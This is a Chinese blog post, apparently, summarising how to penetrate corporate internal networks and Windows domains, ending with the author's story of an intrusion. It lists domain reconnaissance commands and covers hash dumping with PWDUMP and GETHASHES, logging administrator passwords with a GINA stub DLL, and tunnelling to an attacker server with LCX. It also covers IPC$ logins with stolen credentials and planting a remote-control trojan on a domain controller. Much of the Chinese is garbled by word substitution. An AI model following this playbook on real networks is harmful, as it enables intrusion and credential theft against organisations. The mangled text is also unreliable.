常规内网渗透思路总结
绝对来讲,网上的质料少之又少,很少有人对内网渗透写出一些具体的质料以供同行们参考
不日在这,只是大抵的讲一下内网的一些常识.
首先,我们会在什么环境下考虑内网?假设你的方向只局限于一个小WEB,那你彻底不必思考内网了.但是,假设你的方向是一个大WEB,假如一个大公司,那你就必须思考内网的问题.
在我们的渗透进程中,很多大型网络的外部网站也许办事器不定然无效,只管外网也大约作为我们的一个攻破口,毕竟没有通过尝试,我们也不知道轮廓的结构,至少在外部上我们大约失去定然的
消息也说不定,但是对于内网,外网绝对不是我们的主要途径.很多时候我们直接从外网动手,想进入内网,已变得越来越艰难.
那就对内网,我们理当怎么样做呢?有些什么可独霸的?大约有些什么动作?上面,我们就来一块儿探讨下.
渗透,本人即是一个消息收集,今后分类归档,技术独霸,从而到达方针.
那我们拿到一个内网的呆滞时,我们主要要做的事变即是要进入消息的收集,什么消息?很多…
1.收集消息.
1-1. 不管什么途径失去的内网呆滞,必然他在内网后,我们起首就要体会这台呆滞的所属人员,假设我们的方针是公司,那我们就要体会这个人在公司里的职位,他是个什么身份,有多大的权利, 这都关连到他在内网里的权限.因为,作为大公司,一个高权限的人他在内网里所要用到的东西就多,那么绝对他的呆滞,只管权限就会比一样普通普通员工的高很多,这在我的渗透进程中是思空见贯的.
既然有了他的呆滞,那么翻翻他的电脑这是必要的,假设你说要怎么样翻,你大约尝试体会他的电脑乃至比他本身还熟,那你就算体会具体了.一台个人用的电脑,从上面翻出与他自身干系的一些消息,和大批公司消息理当是没有问题的,除非,这是台新电脑.
1-2.体会了定然的人员消息,时代你要记下你所驾御到的账号,明码这些紧迫数据,当前有定然的用,所以,在你渗透夙昔,不妨建个记事本将紧迫消息保管起来,写个记事本不会撙节你几许年光.
接下去,我们就理当对这个网络住手定然的体会,他是一样普通的内网,仍是域?一样普通大公司都邑用域的,我们只须要查一下就知道,要想对他住手渗透,你就必须体会他的网络拓扑,只管,一些太具体的物理上我们是无法体会的,我们只能体会我们所能知道的.不管他是INT,DMZ,LAN,我们必须欠缺驾御.在这,我们就会用到定然的饬令,相信本身理当都很体会.
ipconfig /all 查问一下本机的一些环境,IP段 网关 属于不属于域
net view 查问一些存在联系的呆滞,一样普通以呆滞名暗示,我们须要对其PING出IP,一是轻易查问哪些紧迫呆滞的IP,2是轻易查问存在几个段
net view /domain 查问有几个域 因为大型网络轮廓一样普通不止一个域的
net group /domain 查问域轮廓的组
net user /domain 查问域用户
net group “domain admins” /domain 查问域办理用户组
这些都是我们须要体会的,只管偶尔候还会须要再查问一些消息,NET饬令下你们都邑找到,不须要我再几回再三,具体的环境具体分析问题.
2.消息归档
2-1.有了消息,我们就要抵消息住手定然的归档,将每个呆滞名所对应的IP归档,轻易历时不会乱.
2-2.查问出的用户,办理员,我们也必须归档.
2-3.查问消息时大要泛起的有独霸代价消息必须归档.
3.技术独霸
3-1.不管是经由键盘记实.大约HASH的抓取,我们须要将账号,明码,邮箱,但凡波及关键数据的扫数保管,一方面是准备渗透的质料,2是贯注当前独霸呆滞会掉.
3-1-1.独霸远控的键盘记实住手抓取.
3-1-2.独霸PWDUMP七大约GETHASHES住手抓取HASH,今后破解.GETHASHES V1.4后 大约抓取域的扫数HASH.
3-1-3.用GINASTUB.DLL失去办理员的账号和明码.因为域办理员有权限登岸任何一台呆滞.种上这个只是轻易记实他所登岸的明码.INSTALL后,会在SYSYTEM32下生成一个 FAXMODE.INC 文件记实明码.
3-2.有了内网,很多东西我们是没有必要直接在当前独霸呆滞上独霸的,他人只管是内网,但是不代表他没有抗御琐细,所以,我们创立SOCKS大约VPN是很有必要的,创立SOCKS相信本身都邑了吧.
3-2-1.我在这推荐 VIDC 这个工具,很轻易,在CMD下直接操 VIDC.EXE -D -P PORT 便大约了.
3-2-2.在独霸呆滞上独霸LCX,CMD下 LCX.EXE -SLAVE 办事器IP PORT 12七.0.0.1 PORT,今后到办事器上CMD下 LCX.EXE -LISTEN 办事器IP PORT 方便PORT.
3-2-3.创立SOCKS后在本地大约用SOCKSCAP来住手毗连,侵蚀毗连后该独霸什么就看你们自身了.
基本上我们就只能独霸这么多了,后头已经没有什么技术上的再独霸或独霸,但是这中间的教导许多,所须要处置惩罚惩罚的细节也许多.
我们在失去内网呆滞后,假设他存在域,但是没有独霸域账号怎么样办?那我们只能查问大约想尽扫数能力失去他经常使用的账号明码,今后独霸这个账号明码,再经由SOCKS进入域.这此中就关连到列位 同行查监督束呆滞的文件,另有记实明码,GINA,HASH破解,这些都是必须的.
进入域后,我们又该怎么样做,创立SOCKS后又该怎么样做.我们大约扔S上去查看主要的端口,我们大约对端口住手弱口令的尝试,我们大约针对内网的WEB住手检测,方法很多,乃至你大约用MS08-0六七 对另外一台呆滞住手攻破,但是相信我,能独霸域的呆滞,大全副都是补丁打齐的.我们能独霸的很少,但是不能气馁,只需能在内网穿梭,我们至少在抗御上会紧张很多,我们须要的只是躁急和年光.
一旦拥有明码,我们便大约尝试IPC毗连,直接拿下域,这就得看你们的权限有多大.
net use \IPipc$ password /user:username@domain
推荐独霸这样的方法输出账号和明码,为什么?假设用户名存在空格,你这样输会平安些.什么 域用户不能存在空格?
是的,夙昔我也以为不会,微软的讲师也说不会,不过,通过我的测试和教导,那是假的,域 彻底大约空格,除了user name 这样的,还大约存在 user na me ,不信你大约尝尝.创立IPC后,你只是想COPY文件大约 RAR文件再大约种马 那即是你的镇定了.
后话:迩因由为在渗域,在渗透进程中,也确切泛起一些问题,几回都是不知若何住手,其着实技术上,并没有什么展开.主假定在于对方有着比较强的主抗御,而我的远控最末尾连CMD都无法实验, 后通过几天的环境测试,攻破了CMD.有了CMD后,住手了查问,失去了一些消息,就末尾了往下的渗透,被控呆滞的明码我不是跑出来的,我是翻他的文件翻出他经常使用明码的.因为他没有独霸域账号, 都因而琐细账号登岸,所以无法查看域.我只能用他的域账号创立IPC毗连,查找到内网的一个WEB办事,将其渗透后才算拿下了一个刚强的内网呆滞.
拿下内网WEB办事器后,我就已经彻底在域内,没有独霸HASH INJECTION,我是先查问了DOMAIN ADMINS,创举WEB办事器上的账号就属于这个组,PW后失去了HASH,破解掉我就连向了域控办事器的 IPC$.
毗连了IPC$,直接在其SYSYTEM32下扔了一个远控,今后用AT饬令将其发起,这时候代我尝试了5个SHIFT,但是SHIFT封锁后,我的远控也会掉,所以扫除了这种动作,仍是用AT来ADD NEW JOB 比较轻易 .
给域控办事器种了远控,独霸CMD来GETHASHES了扫数的HASHES住手破解,很厄运的查到了文件办理组的用户,这才有了我后头的方针达成.
总的来讲,我这次的渗透比较运气好,中间费事事不是太多,不过也花了半个月的年光,年光大全副花在测试抗御环境,软件免杀,木马免杀,查找质料这些上面.
其后,我失去了他的网络拓补图,创举我所呆的地区只是一个小小的域,另有好几个域我尚未波及到,在域的前面是DMZ,而DMZ前面只管是INT了.
已经很晚了,正本是在写一份具体的渗透进程,不过因为不绝工作,很多细节没有办法当场记实,所以,长期在BLOG上写一些能想到的,后头假设有年光有环境,会再赔偿更多的细节以及图片和在渗 透时所碰着的费事,若何用意等写出来.
